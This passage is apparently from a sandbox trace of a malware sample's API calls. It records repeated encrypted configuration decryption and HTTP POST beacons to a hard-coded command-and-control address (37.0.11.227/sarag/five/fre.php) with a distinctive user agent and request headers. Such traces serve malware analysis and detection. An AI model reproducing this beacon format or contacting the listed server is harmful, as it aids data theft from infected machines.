*/*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0283.840] GetProcessHeap () returned 0x690000 [0283.840] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afa40 [0283.840] GetProcessHeap () returned 0x690000 [0283.841] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0283.843] GetProcessHeap () returned 0x690000 [0283.843] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4460 [0283.843] GetProcessHeap () returned 0x690000 [0283.843] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0283.844] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0283.845] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0283.845] GetProcessHeap () returned 0x690000 [0283.845] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0283.845] GetProcessHeap () returned 0x690000 [0283.846] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0283.846] send (s=0x8f0, buf=0x6ad508*, len=242, flags=0) returned 242 [0283.847] send (s=0x8f0, buf=0x6aba40*, len=159, flags=0) returned 159 [0283.847] GetProcessHeap () returned 0x690000 [0283.847] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0283.847] recv (in: s=0x8f0, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0283.928] GetProcessHeap () returned 0x690000 [0283.928] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0283.929] GetProcessHeap () returned 0x690000 [0283.929] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4460 | out: hHeap=0x690000) returned 1 [0283.935] GetProcessHeap () returned 0x690000 [0283.936] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afa40 | out: hHeap=0x690000) returned 1 [0283.936] GetProcessHeap () returned 0x690000 [0283.936] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aecc0 | out: hHeap=0x690000) returned 1 [0283.937] closesocket (s=0x8f0) returned 0 [0283.938] GetProcessHeap () returned 0x690000 [0283.938] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab3a0 | out: hHeap=0x690000) returned 1 [0283.938] GetProcessHeap () returned 0x690000 [0283.939] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0283.939] GetProcessHeap () returned 0x690000 [0283.939] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4418 | out: hHeap=0x690000) returned 1 [0283.939] GetProcessHeap () returned 0x690000 [0283.939] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a2f20 | out: hHeap=0x690000) returned 1 [0283.939] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x16f0) returned 0x8f0 [0283.944] Sleep (dwMilliseconds=0xea60) [0283.946] GetProcessHeap () returned 0x690000 [0283.946] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0283.946] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.947] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0283.953] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.953] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0283.960] GetProcessHeap () returned 0x690000 [0283.960] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8a30 [0283.961] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.961] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8a30, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfa8) returned 1 [0283.962] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.962] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0283.965] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.965] CryptSetKeyParam (hKey=0x69cfa8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0283.965] GetProcessHeap () returned 0x690000 [0283.965] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8a30 | out: hHeap=0x690000) returned 1 [0283.978] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.978] CryptDecrypt (in: hKey=0x69cfa8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0283.979] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.979] CryptDestroyKey (hKey=0x69cfa8) returned 1 [0283.980] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.980] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0283.980] GetProcessHeap () returned 0x690000 [0283.980] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0283.981] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0283.981] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0283.981] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0283.982] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0283.982] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0283.983] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0283.983] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0283.984] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0283.984] GetProcessHeap () returned 0x690000 [0283.984] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a3088 [0283.984] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0283.984] GetProcessHeap () returned 0x690000 [0283.984] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3088 | out: hHeap=0x690000) returned 1 [0283.986] GetProcessHeap () returned 0x690000 [0283.986] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0283.986] GetProcessHeap () returned 0x690000 [0283.987] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0283.987] GetProcessHeap () returned 0x690000 [0283.987] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4340 [0283.987] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.988] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0283.992] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.993] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aee58) returned 1 [0283.998] GetProcessHeap () returned 0x690000 [0283.998] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a88b0 [0283.998] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.999] CryptImportKey (in: hProv=0x6aee58, pbData=0x6a88b0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0283.999] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0283.999] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0284.000] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.000] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0284.000] GetProcessHeap () returned 0x690000 [0284.001] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a88b0 | out: hHeap=0x690000) returned 1 [0284.001] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.001] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4340, pdwDataLen=0x19fcfc | out: pbData=0x6a4340, pdwDataLen=0x19fcfc) returned 1 [0284.002] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.002] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0284.003] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.003] CryptReleaseContext (hProv=0x6aee58, dwFlags=0x0) returned 1 [0284.003] GetProcessHeap () returned 0x690000 [0284.003] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0284.004] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.004] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0284.005] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.005] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0284.006] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.006] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0284.006] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.009] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0284.009] GetProcessHeap () returned 0x690000 [0284.009] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0284.009] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0284.009] GetProcessHeap () returned 0x690000 [0284.009] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab410 [0284.009] socket (af=2, type=1, protocol=6) returned 0x8f4 [0284.009] connect (s=0x8f4, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0284.035] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0284.035] GetProcessHeap () returned 0x690000 [0284.035] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6aee58 [0284.035] GetProcessHeap () returned 0x690000 [0284.036] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0284.036] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0284.037] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0284.037] GetProcessHeap () returned 0x690000 [0284.037] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afbc0 [0284.037] GetProcessHeap () returned 0x690000 [0284.038] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0284.038] GetProcessHeap () returned 0x690000 [0284.038] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a3fe0 [0284.038] GetProcessHeap () returned 0x690000 [0284.038] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0284.039] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0284.040] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0284.040] GetProcessHeap () returned 0x690000 [0284.040] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 0x6ad508 [0284.040] GetProcessHeap () returned 0x690000 [0284.040] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0284.040] send (s=0x8f4, buf=0x6ad508*, len=242, flags=0) returned 242 [0284.041] send (s=0x8f4, buf=0x6aba40*, len=159, flags=0) returned 159 [0284.041] GetProcessHeap () returned 0x690000 [0284.041] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xfd0) returned 0x6b2fb8 [0284.041] recv (in: s=0x8f4, buf=0x6b2fb8, len=4048, flags=0 | out: buf=0x6b2fb8*) returned 204 [0284.128] GetProcessHeap () returned 0x690000 [0284.128] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ad508 | out: hHeap=0x690000) returned 1 [0284.128] GetProcessHeap () returned 0x690000 [0284.128] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a3fe0 | out: hHeap=0x690000) returned 1 [0284.129] GetProcessHeap () returned 0x690000 [0284.129] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6afbc0 | out: hHeap=0x690000) returned 1 [0284.129] GetProcessHeap () returned 0x690000 [0284.129] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6aee58 | out: hHeap=0x690000) returned 1 [0284.129] closesocket (s=0x8f4) returned 0 [0284.130] GetProcessHeap () returned 0x690000 [0284.130] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6ab410 | out: hHeap=0x690000) returned 1 [0284.130] GetProcessHeap () returned 0x690000 [0284.130] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0284.130] GetProcessHeap () returned 0x690000 [0284.130] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4340 | out: hHeap=0x690000) returned 1 [0284.130] GetProcessHeap () returned 0x690000 [0284.131] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0284.131] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6b2fb8, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x16f4) returned 0x8f4 [0284.133] Sleep (dwMilliseconds=0xea60) [0284.134] GetProcessHeap () returned 0x690000 [0284.134] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0284.135] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.135] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0284.140] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.141] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6aeff0) returned 1 [0284.147] GetProcessHeap () returned 0x690000 [0284.147] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8820 [0284.148] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.148] CryptImportKey (in: hProv=0x6aeff0, pbData=0x6a8820, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69d5e8) returned 1 [0284.149] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.149] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0284.150] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.150] CryptSetKeyParam (hKey=0x69d5e8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0284.150] GetProcessHeap () returned 0x690000 [0284.151] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8820 | out: hHeap=0x690000) returned 1 [0284.156] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.157] CryptDecrypt (in: hKey=0x69d5e8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0284.157] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.158] CryptDestroyKey (hKey=0x69d5e8) returned 1 [0284.158] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.159] CryptReleaseContext (hProv=0x6aeff0, dwFlags=0x0) returned 1 [0284.159] GetProcessHeap () returned 0x690000 [0284.159] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0284.159] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.160] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0284.161] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.161] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0284.162] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.162] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0284.163] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.163] StrStrA (lpFirst="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0284.163] GetProcessHeap () returned 0x690000 [0284.163] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a31f0 [0284.163] getaddrinfo (in: pNodeName="ÌÈÑÏÑÎÎÑÍÍÈÐ\x8c\x9e\x8d\x9e\x98Ð\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0284.163] GetProcessHeap () returned 0x690000 [0284.164] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a31f0 | out: hHeap=0x690000) returned 1 [0284.164] GetProcessHeap () returned 0x690000 [0284.164] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x698528 | out: hHeap=0x690000) returned 1 [0284.164] GetProcessHeap () returned 0x690000 [0284.164] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a4730 | out: hHeap=0x690000) returned 1 [0284.165] GetProcessHeap () returned 0x690000 [0284.165] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x40) returned 0x6a4730 [0284.165] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.166] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0284.173] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.173] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6af100) returned 1 [0284.179] GetProcessHeap () returned 0x690000 [0284.179] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x24) returned 0x6a8970 [0284.179] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.180] CryptImportKey (in: hProv=0x6af100, pbData=0x6a8970, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x69cfe8) returned 1 [0284.180] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.181] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0284.181] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.181] CryptSetKeyParam (hKey=0x69cfe8, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0284.181] GetProcessHeap () returned 0x690000 [0284.182] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6a8970 | out: hHeap=0x690000) returned 1 [0284.182] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.183] CryptDecrypt (in: hKey=0x69cfe8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6a4730, pdwDataLen=0x19fcfc | out: pbData=0x6a4730, pdwDataLen=0x19fcfc) returned 1 [0284.183] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.184] CryptDestroyKey (hKey=0x69cfe8) returned 1 [0284.184] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76b70000 [0284.184] CryptReleaseContext (hProv=0x6af100, dwFlags=0x0) returned 1 [0284.184] GetProcessHeap () returned 0x690000 [0284.185] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x212) returned 0x698528 [0284.185] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.185] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="http://") returned 0x0 [0284.186] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.186] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="https://") returned 0x0 [0284.187] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.187] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch="/") returned="/sarag/five/fre.php" [0284.188] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76ed0000 [0284.188] StrStrA (lpFirst="37.0.11.227/sarag/five/fre.php", lpSrch=":") returned 0x0 [0284.188] GetProcessHeap () returned 0x690000 [0284.188] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x20) returned 0x6a2f20 [0284.188] getaddrinfo (in: pNodeName="37.0.11.227", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) returned 0 [0284.188] GetProcessHeap () returned 0x690000 [0284.188] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x4) returned 0x6ab360 [0284.188] socket (af=2, type=1, protocol=6) returned 0x8f8 [0284.188] connect (s=0x8f8, name=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), namelen=16) returned 0 [0284.253] FreeAddrInfoW (pAddrInfo=0x6a2f48*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6aebe0*(sa_family=2, sin_port=0x50, sin_addr="37.0.11.227"), ai_next=0x0)) [0284.253] GetProcessHeap () returned 0x690000 [0284.253] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x7d) returned 0x6af078 [0284.253] GetProcessHeap () returned 0x690000 [0284.253] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x201b) returned 0x6b97c0 [0284.254] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0284.255] wvsprintfA (in: param_1=0x6b97c0, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0284.255] GetProcessHeap () returned 0x690000 [0284.255] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xb3) returned 0x6afe00 [0284.255] GetProcessHeap () returned 0x690000 [0284.255] HeapFree (in: hHeap=0x690000, dwFlags=0x0, lpMem=0x6b97c0 | out: hHeap=0x690000) returned 1 [0284.255] GetProcessHeap () returned 0x690000 [0284.255] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x3e) returned 0x6a4340 [0284.255] GetProcessHeap () returned 0x690000 [0284.255] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0x1fdc) returned 0x6b97c0 [0284.256] LoadLibraryW (lpLibFileName="user32") returned 0x755e0000 [0284.257] wvsprintfA (in: param_1=0x6b97c0, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /sarag/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 37.0.11.227\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 4E024674\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0284.257] GetProcessHeap () returned 0x690000 [0284.257] RtlAllocateHeap (HeapHandle=0x690000, Flags=0x0, Size=0xf4) returned 